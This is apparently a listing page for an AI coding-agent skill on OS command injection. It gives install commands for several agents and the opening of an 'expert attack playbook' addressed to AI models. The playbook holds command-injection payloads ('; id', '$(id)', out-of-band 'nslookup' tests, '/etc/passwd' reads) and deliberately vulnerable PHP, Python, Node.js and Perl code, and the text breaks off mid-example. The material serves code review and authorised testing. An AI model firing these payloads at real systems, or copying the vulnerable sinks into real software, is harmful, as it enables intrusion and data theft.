## What it does

The skill maps places where user input can reach a shell command or process launcher. It covers shell operators, command substitution, and input inside quoted strings, file paths, and backticks. Code patterns are shown for PHP, Python, Node.js, Perl, and ASP.

For blind injection, the playbook describes timing checks plus out-of-band tests over DNS, HTTP, and files. It includes Linux and Windows variants, with examples built around `ping`, `nslookup`, `curl`, `subprocess`, and related calls.

When an application passes input to `subprocess.call(..., shell=True)`, that is a clear reason to trace the value into the command. The skill is suited to code review and controlled application testing.

## Install

### Claude Code (native platform)

1. **Skills CLI (Vercel)**
```bash
npx skills add yaklang/hack-skills --skill cmdi-command-injection -a claude-code
```

2. **Manually: put the files in place**
- File: `~/.claude/skills/cmdi-command-injection/SKILL.md` — Copy the whole skill folder; for one project use .claude/skills/cmdi-command-injection/

### Codex

1. **Skills CLI (Vercel)**
```bash
npx skills add yaklang/hack-skills --skill cmdi-command-injection -a codex
```

2. **Manually: put the files in place**
- File: `.agents/skills/cmdi-command-injection/SKILL.md` — For all projects use ~/.agents/skills/

### Cursor

1. **Skills CLI (Vercel)**
```bash
npx skills add yaklang/hack-skills --skill cmdi-command-injection -a cursor
```

2. **Manually: put the files in place**
- File: `.cursor/skills/cmdi-command-injection/SKILL.md` — Cursor also reads .agents/skills/ and .claude/skills/

### GitHub Copilot

1. **GitHub CLI**
```bash
gh skill install yaklang/hack-skills cmdi-command-injection
```

2. **Manually: put the files in place**
- File: `.github/skills/cmdi-command-injection/SKILL.md`

### Gemini CLI

1. **Skills CLI (Vercel)**
```bash
npx skills add yaklang/hack-skills --skill cmdi-command-injection -a gemini-cli
```

2. **Platform CLI**
```bash
gemini skills install https://github.com/yaklang/hack-skills --path skills/cmdi-command-injection
```

### Windsurf (Devin Desktop)

**Manually: put the files in place**
- File: `.devin/skills/cmdi-command-injection/SKILL.md` — The legacy .windsurf/skills/ path still works

### OpenCode

**Skills CLI (Vercel)**
```bash
npx skills add yaklang/hack-skills --skill cmdi-command-injection -a opencode
```

### Claude.ai

**Claude.ai**
- Zip the folder and upload it in Settings → Capabilities → Skills

Where a file is given instead of a command, copy the files from the source to that path: https://github.com/yaklang/hack-skills/tree/HEAD/skills/cmdi-command-injection/SKILL.md

## When to use it
- trace user input into shell commands
- check blind injection through response delays
- test OOB command paths over DNS and HTTP
- match vulnerable calls across PHP, Python, and Node.js
- inspect quoting and file-path injection contexts

## Example prompts
- Use this skill to review the project for user input reaching shell commands and list the risky paths.
- Analyze blind command injection in this application and suggest timing-based and DNS OOB checks.
- Review `subprocess`, `os.system`, and `child_process.exec` calls and explain the risk at each sink.

# SKILL: OS Command Injection — Expert Attack Playbook

> **AI LOAD INSTRUCTION**: Expert command injection techniques. Covers all shell metacharacters, blind injection, time-based detection, OOB exfiltration, polyglot payloads, and real-world code patterns. Base models miss subtle injection through unexpected input vectors.

## 0. RELATED ROUTING

Before going deep, you can first load:

- [upload insecure files](../upload-insecure-files/SKILL.md) when the shell sink is part of a broader upload, import, or conversion workflow

### First-pass payload families

| Context | Start With | Backup |
|---|---|---|
| generic shell separator | `;id` | `&&id` |
| quoted argument | `";id;"` | `';id;'` |
| blind timing | `;sleep 5` | `& timeout /T 5 /NOBREAK` |
| command substitution | `$(id)` | `` `id` `` |
| out-of-band DNS | `;nslookup token.collab` | Windows `nslookup` variant |

```text
cat$IFS/etc/passwd
{cat,/etc/passwd}
%0aid
```

---

## 1. SHELL METACHARACTERS (INJECTION OPERATORS)

These characters break out of the command context and inject new commands:

| Metacharacter | Behavior | Example |
|---|---|---|
| `;` | Runs second command regardless | `dir; whoami` |
| `\|` | Pipes stdout to second command | `dir \| whoami` |
| `\|\|` | Run second only if first FAILS | `dir \|\| whoami` |
| `&` | Run second in background (or sequenced in Windows) | `dir & whoami` |
| `&&` | Run second only if first SUCCEEDS | `dir && whoami` |
| `$(cmd)` | Command substitution | `echo $(whoami)` |
| `` `cmd` `` | Command substitution (backtick) | `` echo `whoami` `` |
| `>` | Redirect stdout to file | `cmd > /tmp/out` |
| `>>` | Append to file | `cmd >> /tmp/out` |
| `<` | Read file as stdin | `cmd < /etc/passwd` |
| `%0a` | Newline character (URL-encoded) | `cmd%0awhoami` |
| `%0d%0a` | CRLF | Multi-command injection |

---

## 2. COMMON VULNERABLE CODE PATTERNS

### PHP
```php
$dir = $_GET['dir'];
$out = shell_exec("du -h /var/www/html/" . $dir);
// Inject: dir=../ ; cat /etc/passwd
// Inject: dir=../ $(cat /etc/passwd)
exec("ping -c 1 " . $ip);          // $ip = "127.0.0.1 && cat /etc/passwd"
system("convert " . $file);        // ImageMagick RCE
passthru("nslookup " . $host);     // $host = "x.com; id"
```

### Python
```python
import os
os.system("curl " + url)            # url = "x.com; id"
subprocess.call("ls " + path, shell=True)  # shell=True is the key vulnerability
os.popen("ping " + host)
```

### Node.js
```javascript
const { exec } = require('child_process');
exec('ping ' + req.query.host, ...);  // host = "x.com; id"
```

### Perl
```perl
$dir = param("dir");
$command = "du -h /var/www/html" . $dir;
system($command);
